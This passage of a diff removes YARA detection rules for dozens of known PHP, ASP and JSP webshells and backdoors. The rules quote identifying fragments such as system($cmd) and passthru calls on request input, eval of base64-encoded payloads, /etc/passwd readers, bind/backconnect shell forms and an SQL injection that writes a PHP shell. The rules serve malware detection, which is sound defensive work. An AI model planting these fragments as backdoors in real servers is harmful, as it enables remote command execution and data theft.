-		$s12 = "while (($ekinci=readdir ($sedat))){" fullword
-		$s19 = "$deger2= \"$ich[$tampon4]\";" fullword
-	condition:
-		2 of them
-}
-rule WebShell_b374k_php {
-	meta:
-		description = "PHP Webshells Github Archive - file b374k.php.php"
-		author = "Florian Roth"
-		hash = "04c99efd187cf29dc4e5603c51be44170987bce2"
-	strings:
-		$s0 = "// encrypt your password to md5 here http://kerinci.net/?x=decode" fullword
-		$s6 = "// password (default is: b374k)"
-		$s8 = "//******************************************************************************"
-		$s9 = "// b374k 2.2" fullword
-		$s10 = "eval(\"?>\".gzinflate(base64_decode("
-	condition:
-		3 of them
-}
-rule WebShell_SimAttacker___Vrsion_1_0_0___priv8_4_My_friend {
-	meta:
-		description = "PHP Webshells Github Archive - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
-		author = "Florian Roth"
-		hash = "6454cc5ab73143d72cf0025a81bd1fe710351b44"
-	strings:
-		$s4 = "&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>" fullword
-		$s5 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
-		$s10 = "<a style=\"TEXT-DECORATION: none\" href=\"http://www.simorgh-ev.com\">" fullword
-		$s16 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
-		$s17 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
-		$s19 = "$Comments=$_POST['Comments'];" fullword
-		$s20 = "Victim Mail :<br><input type='text' name='to' ><br>" fullword
-	condition:
-		3 of them
-}
-rule WebShell_h4ntu_shell__powered_by_tsoi_ {
-	meta:
-		description = "PHP Webshells Github Archive - file h4ntu shell [powered by tsoi].php"
-		author = "Florian Roth"
-		hash = "cbca8cd000e705357e2a7e0cf8262678706f18f9"
-	strings:
-		$s11 = "<title>h4ntu shell [powered by tsoi]</title>" fullword
-		$s13 = "$cmd = $_POST['cmd'];" fullword
-		$s16 = "$uname = posix_uname( );" fullword
-		$s17 = "if(!$whoami)$whoami=exec(\"whoami\");" fullword
-		$s18 = "echo \"<p><font size=2 face=Verdana><b>This Is The Server Information</b></font>"
-		$s20 = "ob_end_clean();" fullword
-	condition:
-		3 of them
-}
-rule WebShell_php_webshells_MyShell {
-	meta:
-		description = "PHP Webshells Github Archive - file MyShell.php"
-		author = "Florian Roth"
-		hash = "42e283c594c4d061f80a18f5ade0717d3fb2f76d"
-	strings:
-		$s3 = "<title>MyShell error - Access Denied</title>" fullword
-		$s4 = "$adminEmail = \"youremail@yourserver.com\";" fullword
-		$s5 = "//A workdir has been asked for - we chdir to that dir." fullword
-		$s6 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"
-		$s13 = "#$autoErrorTrap Enable automatic error traping if command returns error." fullword
-		$s14 = "/* No work_dir - we chdir to $DOCUMENT_ROOT */" fullword
-		$s19 = "#every command you excecute." fullword
-		$s20 = "<form name=\"shell\" method=\"post\">" fullword
-	condition:
-		3 of them
-}
-rule WebShell_php_webshells_pws {
-	meta:
-		description = "PHP Webshells Github Archive - file pws.php"
-		author = "Florian Roth"
-		hash = "7a405f1c179a84ff8ac09a42177a2bcd8a1a481b"
-	strings:
-		$s6 = "if ($_POST['cmd']){" fullword
-		$s7 = "$cmd = $_POST['cmd'];" fullword
-		$s10 = "echo \"FILE UPLOADED TO $dez\";" fullword
-		$s11 = "if (file_exists($uploaded)) {" fullword
-		$s12 = "copy($uploaded, $dez);" fullword
-		$s17 = "passthru($cmd);" fullword
-	condition:
-		4 of them
-}
-rule WebShell_reader_asp_php {
-	meta:
-		description = "PHP Webshells Github Archive - file reader.asp.php.txt"
-		author = "Florian Roth"
-		hash = "70656f3495e2b3ad391a77d5208eec0fb9e2d931"
-	strings:
-		$s5 = "ster\" name=submit> </Font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail"
-		$s12 = " HACKING " fullword
-		$s16 = "FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: "
-		$s20 = "PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKG"
-	condition:
-		3 of them
-}
-rule WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 {
-	meta:
-		description = "PHP Webshells Github Archive - file Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php"
-		author = "Florian Roth"
-		hash = "db076b7c80d2a5279cab2578aa19cb18aea92832"
-	strings:
-		$s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
-		$s6 = "by PHP Emperor<xb5@hotmail.com>" fullword
-		$s9 = "\".htmlspecialchars($file).\" has been already loaded. PHP Emperor <xb5@hotmail."
-		$s11 = "die(\"<FONT COLOR=\\\"RED\\\"><CENTER>Sorry... File" fullword
-		$s15 = "if(empty($_GET['file'])){" fullword
-		$s16 = "echo \"<head><title>Safe Mode Shell</title></head>\"; " fullword
-	condition:
-		3 of them
-}
-rule WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit {
-	meta:
-		description = "PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
-		author = "Florian Roth"
-		hash = "b2b797707e09c12ff5e632af84b394ad41a46fa4"
-	strings:
-		$s4 = "$liz0zim=shell_exec($_POST[liz0]); " fullword
-		$s6 = "$liz0=shell_exec($_POST[baba]); " fullword
-		$s9 = "echo \"<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass E"
-		$s12 = " :=) :</font><select size=\"1\" name=\"liz0\">" fullword
-		$s13 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
-	condition:
-		1 of them
-}
-rule WebShell_php_backdoor {
-	meta:
-		description = "PHP Webshells Github Archive - file php-backdoor.php"
-		author = "Florian Roth"
-		hash = "b190c03af4f3fb52adc20eb0f5d4d151020c74fe"
-	strings:
-		$s5 = "http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix" fullword
-		$s6 = "// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombi"
-		$s11 = "if(!isset($_REQUEST['dir'])) die('hey,specify directory!');" fullword
-		$s13 = "else echo \"<a href='$PHP_SELF?f=$d/$dir'><font color=black>\";" fullword
-		$s15 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
-	condition:
-		1 of them
-}
-rule WebShell_Worse_Linux_Shell {
-	meta:
-		description = "PHP Webshells Github Archive - file Worse Linux Shell.php"
-		author = "Florian Roth"
-		hash = "64623ab1246bc8f7d256b25f244eb2b41f543e96"
-	strings:
-		$s4 = "if( $_POST['_act'] == \"Upload!\" ) {" fullword
-		$s5 = "print \"<center><h1>#worst @dal.net</h1></center>\";" fullword
-		$s7 = "print \"<center><h1>Linux Shells</h1></center>\";" fullword
-		$s8 = "$currentCMD = \"ls -la\";" fullword
-		$s14 = "print \"<tr><td><b>System type:</b></td><td>$UName</td></tr>\";" fullword
-		$s19 = "$currentCMD = str_replace(\"\\\\\\\\\",\"\\\\\",$_POST['_cmd']);" fullword
-	condition:
-		2 of them
-}
-rule WebShell_php_webshells_pHpINJ {
-	meta:
-		description = "PHP Webshells Github Archive - file pHpINJ.php"
-		author = "Florian Roth"
-		hash = "75116bee1ab122861b155cc1ce45a112c28b9596"
-	strings:
-		$s3 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';" fullword
-		$s10 = "<form action = \"<?php echo \"$_SERVER[PHP_SELF]\" ; ?>\" method = \"post\">" fullword
-		$s11 = "$sql = \"0' UNION SELECT '0' , '<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 IN"
-		$s13 = "Full server path to a writable file which will contain the Php Shell <br />" fullword
-		$s14 = "$expurl= $url.\"?id=\".$sql ;" fullword
-		$s15 = "<header>||   .::News PHP Shell Injection::.   ||</header> <br /> <br />" fullword
-		$s16 = "<input type = \"submit\" value = \"Create Exploit\"> <br /> <br />" fullword
-	condition:
-		1 of them
-}
-rule WebShell_php_webshells_NGH {
-	meta:
-		description = "PHP Webshells Github Archive - file NGH.php"
-		author = "Florian Roth"
-		hash = "c05b5deecfc6de972aa4652cb66da89cfb3e1645"
-	strings:
-		$s0 = "<title>Webcommander at <?=$_SERVER[\"HTTP_HOST\"]?></title>" fullword
-		$s2 = "/* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */" fullword
-		$s5 = "<form action=<?=$script?>?act=bindshell method=POST>" fullword
-		$s9 = "<form action=<?=$script?>?act=backconnect method=POST>" fullword
-		$s11 = "<form action=<?=$script?>?act=mkdir method=POST>" fullword
-		$s16 = "die(\"<font color=#DF0000>Login error</font>\");" fullword
-		$s20 = "<b>Bind /bin/bash at port: </b><input type=text name=port size=8>" fullword
-	condition:
-		2 of them
-}
-rule WebShell_php_webshells_matamu {
-	meta:
-		description = "PHP Webshells Github Archive - file matamu.php"
-		author = "Florian Roth"
-		hash = "d477aae6bd2f288b578dbf05c1c46b3aaa474733"
-	strings:
-		$s2 = "$command .= ' -F';" fullword
-		$s3 = "/* We try and match a cd command. */" fullword
-		$s4 = "directory... Trust me - it works :-) */" fullword
-		$s5 = "$command .= \" 1> $tmpfile 2>&1; \" ." fullword
-		$s10 = "$new_dir = $regs[1]; // 'cd /something/...'" fullword
-		$s16 = "/* The last / in work_dir were the first charecter." fullword
-	condition:
-		2 of them
-}
-rule WebShell_ru24_post_sh {
-	meta:
-		description = "PHP Webshells Github Archive - file ru24_post_sh.php"
-		author = "Florian Roth"
-		hash = "d2c18766a1cd4dda928c12ff7b519578ccec0769"
-	strings:
-		$s1 = "http://www.ru24-team.net" fullword
-		$s4 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
-		$s6 = "Ru24PostWebShell"
-		$s7 = "Writed by DreAmeRz" fullword
-		$s9 = "$function=passthru; // system, exec, cmd" fullword
-	condition:
-		1 of them
-}
-rule WebShell_hiddens_shell_v1 {
-	meta:
-		description = "PHP Webshells Github Archive - file hiddens shell v1.php"
-		author = "Florian Roth"
-		hash = "1674bd40eb98b48427c547bf9143aa7fbe2f4a59"
-	strings:
-		$s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"
-	condition:
-		all of them
-}
-rule WebShell_c99_madnet {
-	meta:
-		description = "PHP Webshells Github Archive - file c99_madnet.php"
-		author = "Florian Roth"
-		hash = "17613df393d0a99fd5bea18b2d4707f566cff219"
-	strings:
-		$s0 = "$md5_pass = \"\"; //If no pass then hash" fullword
-		$s1 = "eval(gzinflate(base64_decode('"
-		$s2 = "$pass = \"pass\";  //Pass" fullword
-		$s3 = "$login = \"user\"; //Login" fullword
-		$s4 = "             //Authentication" fullword
-	condition:
-		all of them
-}
-rule WebShell_c99_locus7s {
-	meta:
-		description = "PHP Webshells Github Archive - file c99_locus7s.php"
-		author = "Florian Roth"
-		hash = "d413d4700daed07561c9f95e1468fb80238fbf3c"
-	strings:
-		$s8 = "$encoded = base64_encode(file_get_contents($d.$f)); " fullword
-		$s9 = "$file = $tmpdir.\"dump_\".getenv(\"SERVER_NAME\").\"_\".$db.\"_\".date(\"d-m-Y"
-		$s10 = "else {$tmp = htmlspecialchars(\"./dump_\".getenv(\"SERVER_NAME\").\"_\".$sq"
-		$s11 = "$c99sh_sourcesurl = \"http://locus7s.com/\"; //Sources-server " fullword
-		$s19 = "$nixpwdperpage = 100; // Get first N lines from /etc/passwd " fullword
-	condition:
-		2 of them
-}
-rule WebShell_JspWebshell_1_2 {
-	meta:
-		description = "PHP Webshells Github Archive - file JspWebshell_1.2.php"
-		author = "Florian Roth"
-		hash = "0bed4a1966117dd872ac9e8dceceb54024a030fa"
-	strings:
-		$s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
-		$s1 = "String password=request.getParameter(\"password\");" fullword
-		$s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
-		$s7 = "String editfile=request.getParameter(\"editfile\");" fullword
-		$s8 = "//String tempfilename=request.getParameter(\"file\");" fullword
-		$s12 = "password = (String)session.getAttribute(\"password\");" fullword
-	condition:
-		3 of them
-}
-rule WebShell_safe0ver {
-	meta:
-		description = "PHP Webshells Github Archive - file safe0ver.php"
-		author = "Florian Roth"
-		hash = "366639526d92bd38ff7218b8539ac0f154190eb8"
-	strings:
-		$s3 = "$scriptident = \"$scriptTitle By Evilc0der.com\";" fullword
-		$s4 = "while (file_exists(\"$lastdir/newfile$i.txt\"))" fullword
-		$s5 = "else { /* <!-- Then it must be a File... --> */" fullword
-		$s7 = "$contents .= htmlentities( $line ) ;" fullword
-		$s8 = "<br><p><br>Safe Mode ByPAss<p><form method=\"POST\">" fullword
-		$s14 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
-		$s20 = "/* <!-- End of Actions --> */" fullword
-	condition:
-		3 of them
-}
-rule WebShell_Uploader {
-	meta:
-		description = "PHP Webshells Github Archive - file Uploader.php"
-		author = "Florian Roth"
-		hash = "e216c5863a23fde8a449c31660fd413d77cce0b7"
-	strings:
-		$s1 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
-	condition:
-		all of them
-}
-rule WebShell_php_webshells_kral {
-	meta:
-		description = "PHP Webshells Github Archive - file kral.php"
-		author = "Florian Roth"
-		hash = "4cd1d1a2fd448cecc605970e3a89f3c2e5c80dfc"
-	strings:
-		$s1 = "$adres=gethostbyname($ip);" fullword
-		$s3 = "curl_setopt($ch,CURLOPT_POSTFIELDS,\"domain=\".$site);" fullword
-		$s4 = "$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";" fullword
-		$s16 = "echo $son.' <br> <font color=\"green\">Access</font><br>';" fullword
-		$s17 = "<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">BLaSTER</a><br /"
-		$s20 = "<p><strong>Server listeleyici</strong><br />" fullword
-	condition:
-		2 of them
-}
-rule WebShell_cgitelnet {
-	meta:
-		description = "PHP Webshells Github Archive - file cgitelnet.php"
-		author = "Florian Roth"
-		hash = "72e5f0e4cd438e47b6454de297267770a36cbeb3"
-	strings:
-		$s9 = "# Author Homepage: http://www.rohitab.com/" fullword
-		$s10 = "elsif($Action eq \"command\") # user wants to run a command" fullword
-		$s18 = "# in a command line on Windows NT." fullword
-		$s20 = "print \"Transfered $TargetFileSize Bytes.<br>\";" fullword
-	condition:
-		2 of them
-}
-rule WebShell_simple_backdoor {
-	meta:
-		description = "PHP Webshells Github Archive - file simple-backdoor.php"
-		author = "Florian Roth"
-		hash = "edcd5157a68fa00723a506ca86d6cbb8884ef512"
-	strings:
-		$s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
-		$s1 = "<!--    http://michaeldaw.org   2006    -->" fullword
-		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
-		$s3 = "        echo \"</pre>\";" fullword
-		$s4 = "        $cmd = ($_REQUEST['cmd']);" fullword
-		$s5 = "        echo \"<pre>\";" fullword
-		$s6 = "if(isset($_REQUEST['cmd'])){" fullword
-		$s7 = "        die;" fullword
-		$s8 = "        system($cmd);" fullword
-	condition:
-		all of them
-}
-rule WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_2 {
-	meta:
-		description = "PHP Webshells Github Archive - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
-		author = "Florian Roth"
-		hash = "8fdd4e0e87c044177e9e1c97084eb5b18e2f1c25"
-	strings:
-		$s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
-		$s3 = "xb5@hotmail.com</FONT></CENTER></B>\");" fullword
-		$s4 = "$v = @ini_get(\"open_basedir\");" fullword
-		$s6 = "by PHP Emperor<xb5@hotmail.com>" fullword
-	condition:
-		2 of them
-}
-rule WebShell_NTDaddy_v1_9 {
-	meta:
-		description = "PHP Webshells Github Archive - file NTDaddy v1.9.php"
-		author = "Florian Roth"
-		hash = "79519aa407fff72b7510c6a63c877f2e07d7554b"
-	strings:
-		$s2 = "|     -obzerve : mr_o@ihateclowns.com |" fullword
-		$s6 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
-		$s13 = "<form action=ntdaddy.asp method=post>" fullword
-		$s17 = "response.write(\"<ERROR: THIS IS NOT A TEXT FILE>\")" fullword
-	condition:
-		2 of them
-}
-rule WebShell_lamashell {
-	meta:
-		description = "PHP Webshells Github Archive - file lamashell.php"
-		author = "Florian Roth"
-		hash = "b71181e0d899b2b07bc55aebb27da6706ea1b560"
-	strings:
-		$s0 = "if(($_POST['exe']) == \"Execute\") {" fullword
-		$s8 = "$curcmd = $_POST['king'];" fullword
-		$s16 = "\"http://www.w3.org/TR/html4/loose.dtd\">" fullword
-		$s18 = "<title>lama's'hell v. 3.0</title>" fullword
-		$s19 = "_|_  O    _    O  _|_" fullword
-		$s20 = "$curcmd = \"ls -lah\";" fullword
-	condition:
-		2 of them
-}
-rule WebShell_Simple_PHP_backdoor_by_DK {
-	meta:
-		description = "PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php"
-		author = "Florian Roth"
-		hash = "03f6215548ed370bec0332199be7c4f68105274e"
-	strings:
-		$s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
-		$s1 = "<!--    http://michaeldaw.org   2006    -->" fullword
-		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
-		$s6 = "if(isset($_REQUEST['cmd'])){" fullword
-		$s8 = "system($cmd);" fullword
-	condition:
-		2 of them
-}
-rule WebShell_Moroccan_Spamers_Ma_EditioN_By_GhOsT {
-	meta:
-		description = "PHP Webshells Github Archive - file Moroccan Spamers Ma-EditioN By GhOsT.php"
-		author = "Florian Roth"
-		hash = "31e5473920a2cc445d246bc5820037d8fe383201"
-	strings:
-		$s4 = "$content = chunk_split(base64_encode($content)); " fullword
-		$s12 = "print \"Sending mail to $to....... \"; " fullword
-		$s16 = "if (!$from && !$subject && !$message && !$emaillist){ " fullword
-	condition:
-		all of them
-}
-rule WebShell_C99madShell_v__2_0_madnet_edition {
-	meta:
-		description = "PHP Webshells Github Archive - file C99madShell v. 2.0 madnet edition.php"
-		author = "Florian Roth"
-		hash = "f99f8228eb12746847f54bad45084f19d1a7e111"
-	strings:
-		$s0 = "$md5_pass = \"\"; //If no pass then hash" fullword
-		$s1 = "eval(gzinflate(base64_decode('"
-		$s2 = "$pass = \"\";  //Pass" fullword
-		$s3 = "$login = \"\"; //Login" fullword
-		$s4 = "//Authentication" fullword
-	condition:
-		all of them
-}
-rule WebShell_CmdAsp_asp_php {
-	meta:
-		description = "PHP Webshells Github Archive - file CmdAsp.asp.php.txt"
-		author = "Florian Roth"
-		hash = "cb18e1ac11e37e236e244b96c2af2d313feda696"
-	strings:
-		$s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
-		$s4 = "' Author: Maceo <maceo @ dogmile.com>" fullword
-		$s5 = "' -- Use a poor man's pipe ... a temp file -- '" fullword
-		$s6 = "' --------------------o0o--------------------" fullword
-		$s8 = "' File: CmdAsp.asp" fullword
-		$s11 = "<-- CmdAsp.asp -->" fullword
-		$s14 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
-		$s16 = "Set oScriptNet = Server.CreateObject(\"WSCRIPT.NETWORK\")" fullword
-		$s19 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
-	condition:
-		4 of them
-}
-rule WebShell_NCC_Shell {
-	meta:
-		description = "PHP Webshells Github Archive - file NCC-Shell.php"
-		author = "Florian Roth"
-		hash = "64d4495875a809b2730bd93bec2e33902ea80a53"
-	strings:
-		$s0 = " if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {" fullword
-		$s1 = "<b>--Coded by Silver" fullword
-		$s2 = "<title>Upload - Shell/Datei</title>" fullword
-		$s8 = "<a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->NCC<--</a></center></b><"
-		$s14 = "~|_Team .:National Cracker Crew:._|~<br>" fullword
-		$s18 = "printf(\"Sie ist %u Bytes gro" fullword
-	condition:
-		3 of them
-}
-rule WebShell_php_webshells_README {
-	meta:
-		description = "PHP Webshells Github Archive - file README.md"
-		author = "Florian Roth"
-		hash = "ef2c567b4782c994db48de0168deb29c812f7204"
-	strings:
-		$s0 = "Common php webshells. Do not host the file(s) in your server!" fullword
-		$s1 = "php-webshells" fullword
-	condition:
-		all of them
-}
-rule WebShell_backupsql {
-	meta:
-		description = "PHP Webshells Github Archive - file backupsql.php"
-		author = "Florian Roth"
-		hash = "863e017545ec8e16a0df5f420f2d708631020dd4"
-	strings:
-		$s0 = "$headers .= \"\\nMIME-Version: 1.0\\n\" .\"Content-Type: multipart/mixed;\\n\" ."
-		$s1 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
-		$s2 = "* as email attachment, or send to a remote ftp server by" fullword
-		$s16 = "* Neagu Mihai<neagumihai@hotmail.com>" fullword
-		$s17 = "$from    = \"Neu-Cool@email.com\";  // Who should the emails be sent from?, may "
-	condition:
-		2 of them
-}
-rule WebShell_AK_74_Security_Team_Web_Shell_Beta_Version {
-	meta:
-		description = "PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php"
-		author = "Florian Roth"
-		hash = "c90b0ba575f432ecc08f8f292f3013b5532fe2c4"
-	strings:
-		$s8 = "- AK-74 Security Team Web Site: www.ak74-team.net" fullword
-		$s9 = "<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'."
-		$s10 = "<b><font color=#83000>Execute system commands!</font></b>" fullword
-	condition:
-		1 of them
-}
-rule WebShell_php_webshells_cpanel {
-	meta:
-		description = "PHP Webshells Github Archive - file cpanel.php"
-		author = "Florian Roth"
-		hash = "433dab17106b175c7cf73f4f094e835d453c0874"
-	strings:
-		$s0 = "function ftp_check($host,$user,$pass,$timeout){" fullword
-		$s3 = "curl_setopt($ch, CURLOPT_URL, \"http://$host:2082\");" fullword
-		$s4 = "[ user@alturks.com ]# info<b><br><font face=tahoma><br>" fullword
-		$s12 = "curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);" fullword
-		$s13 = "Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir"
-		$s20 = "<br><b>Please enter your USERNAME and PASSWORD to logon<br>" fullword
-	condition:
-		2 of them
-}
-rule WebShell_accept_language {
-	meta:
-		description = "PHP Webshells Github Archive - file accept_language.php"
-		author = "Florian Roth"
-		hash = "180b13576f8a5407ab3325671b63750adbcb62c9"
-	strings:
-		$s0 = "<?php passthru(getenv(\"HTTP_ACCEPT_LANGUAGE\")); echo '<br> by q1w2e3r4'; ?>" fullword
-	condition:
-		all of them
-}
-rule WebShell_php_webshells_529 {
-	meta:
-		description = "PHP Webshells Github Archive - file 529.php"
-		author = "Florian Roth"
-		hash = "ba3fb2995528307487dff7d5b624d9f4c94c75d3"
-	strings:
-		$s0 = "<p>More: <a href=\"/\">Md5Cracking.Com Crew</a> " fullword
-		$s7 = "href=\"/\" title=\"Securityhouse\">Security House - Shell Center - Edited By Kin"
-		$s9 = "echo '<PRE><P>This is exploit from <a " fullword
-		$s10 = "This Exploit Was Edited By KingDefacer" fullword
-		$s13 = "safe_mode and open_basedir Bypass PHP 5.2.9 " fullword
-		$s14 = "$hardstyle = explode(\"/\", $file); " fullword
-		$s20 = "while($level--) chdir(\"..\"); " fullword
-	condition:
-		2 of them
-}
-rule WebShell_STNC_WebShell_v0_8 {
-	meta:
-		description = "PHP Webshells Github Archive - file STNC WebShell v0.8.php"
-		author = "Florian Roth"
-		hash = "52068c9dff65f1caae8f4c60d0225708612bb8bc"
-	strings:
-		$s3 = "if(isset($_POST[\"action\"])) $action = $_POST[\"action\"];" fullword
-		$s8 = "elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean()"
-		$s13 = "{ $pwd = $_POST[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw"
-	condition:
-		2 of them
-}
-rule WebShell_php_webshells_tryag {
-	meta:
-		description = "PHP Webshells Github Archive - file tryag.php"
-		author = "Florian Roth"
-		hash = "42d837e9ab764e95ed11b8bd6c29699d13fe4c41"
-	strings:
-		$s1 = "<title>TrYaG Team - TrYaG.php - Edited By KingDefacer</title>" fullword
-		$s3 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\"; " fullword
-		$s6 = "$string = !empty($_POST['string']) ? $_POST['string'] : 0; " fullword
-		$s7 = "$tabledump .= \"CREATE TABLE $table (\\n\"; " fullword
-		$s14 = "echo \"<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUE"
-	condition:
-		3 of them
-}
-rule WebShell_dC3_Security_Crew_Shell_PRiV_2 {
-	meta:
-		description = "PHP Webshells Github Archive - file dC3 Security Crew Shell PRiV.php"
-		author = "Florian Roth"
-		hash = "9077eb05f4ce19c31c93c2421430dd3068a37f17"
-	strings:
-		$s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
-		$s9 = "header(\"Last-Modified: \".date(\"r\",filemtime(__FILE__)));" fullword
-		$s13 = "header(\"Content-type: image/gif\");" fullword
-		$s14 = "@copy($file,$to) or die (\"[-]Error copying file!\");" fullword
-		$s20 = "if (isset($_GET['rename_all'])) {" fullword
-	condition:
-		3 of them
-}
-rule WebShell_qsd_php_backdoor {
-	meta:
-		description = "PHP Webshells Github Archive - file qsd-php-backdoor.php"
-		author = "Florian Roth"
-		hash = "4856bce45fc5b3f938d8125f7cdd35a8bbae380f"
-	strings:
-		$s1 = "// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.c"
-		$s2 = "if(isset($_POST[\"newcontent\"]))" fullword
-		$s3 = "foreach($parts as $val)//Assemble the path back together" fullword
-		$s7 = "$_POST[\"newcontent\"]=urldecode(base64_decode($_POST[\"newcontent\"]));" fullword
-	condition:
-		2 of them
-}
-rule WebShell_php_webshells_spygrup {
-	meta:
-		description = "PHP Webshells Github Archive - file spygrup.php"
-		author = "Florian Roth"
-		hash = "12f9105332f5dc5d6360a26706cd79afa07fe004"
-	strings:
-		$s2 = "kingdefacer@msn.com</FONT></CENTER></B>\");" fullword
-		$s6 = "if($_POST['root']) $root = $_POST['root'];" fullword
-		$s12 = "\".htmlspecialchars($file).\" Bu Dosya zaten Goruntuleniyor<kingdefacer@msn.com>" fullword
-		$s18 = "By KingDefacer From Spygrup.org>" fullword
-	condition:
-		3 of them
-}
-rule WebShell_Web_shell__c_ShAnKaR {
-	meta:
-		description = "PHP Webshells Github Archive - file Web-shell (c)ShAnKaR.php"
-		author = "Florian Roth"
-		hash = "3dd4f25bd132beb59d2ae0c813373c9ea20e1b7a"
-	strings:
-		$s0 = "header(\"Content-Length: \".filesize($_POST['downf']));" fullword
-		$s5 = "if($_POST['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dump"
-		$s6 = "write(\"#\\n#Server : \".getenv('SERVER_NAME').\"" fullword
-		$s12 = "foreach(@file($_POST['passwd']) as $fed)echo $fed;" fullword
-	condition:
-		2 of them
-}
-rule WebShell_Ayyildiz_Tim___AYT__Shell_v_2_1_Biz {
-	meta:
-		description = "PHP Webshells Github Archive - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.php"
-		author = "Florian Roth"
-		hash = "5fe8c1d01dc5bc70372a8a04410faf8fcde3cb68"
-	strings:
-		$s7 = "<meta name=\"Copyright\" content=TouCh By iJOo\">" fullword
-		$s11 = "directory... Trust me - it works :-) */" fullword
-		$s15 = "/* ls looks much better with ' -F', IMHO. */" fullword
-		$s16 = "} else if ($command == 'ls') {" fullword
-	condition:
-		3 of them
-}
-rule WebShell_Gamma_Web_Shell {
-	meta:
-		description = "PHP Webshells Github Archive - file Gamma Web Shell.php"
-		author = "Florian Roth"
-		hash = "7ef773df7a2f221468cc8f7683e1ace6b1e8139a"
-	strings:
-		$s4 = "$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];" fullword
-		$s8 = "### Gamma Group <http://www.gammacenter.com>" fullword
-		$s15 = "my $error = \"This command is not available in the restricted mode.\\n\";" fullword
-		$s20 = "my $command = $self->query('command');" fullword
-	condition:
-		2 of them
-}
-rule WebShell_php_webshells_aspydrv {
-	meta:
-		description = "PHP Webshells Github Archive - file aspydrv.php"
-		author = "Florian Roth"
-		hash = "3d8996b625025dc549d73cdb3e5fa678ab35d32a"
-	strings:
-		$s0 = "Target = \"D:\\hshome\\masterhr\\masterhr.com\\\"  ' ---Directory to which files"
-		$s1 = "nPos = InstrB(nPosEnd, biData, CByteString(\"Content-Type:\"))" fullword
-		$s3 = "Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1" fullword
-		$s17 = "If request.querystring(\"getDRVs\")=\"@\" then" fullword
-		$s20 = "' ---Copy Too Folder routine Start" fullword
-	condition:
-		3 of them
-}
-rule WebShell_JspWebshell_1_2_2 {
-	meta:
-		description = "PHP Webshells Github Archive - file JspWebshell 1.2.php"
-		author = "Florian Roth"
-		hash = "184fc72b51d1429c44a4c8de43081e00967cf86b"
-	strings:
-		$s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
-		$s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
-		$s4 = "// String tempfilepath=request.getParameter(\"filepath\");" fullword
-		$s15 = "endPoint=random1.getFilePointer();" fullword
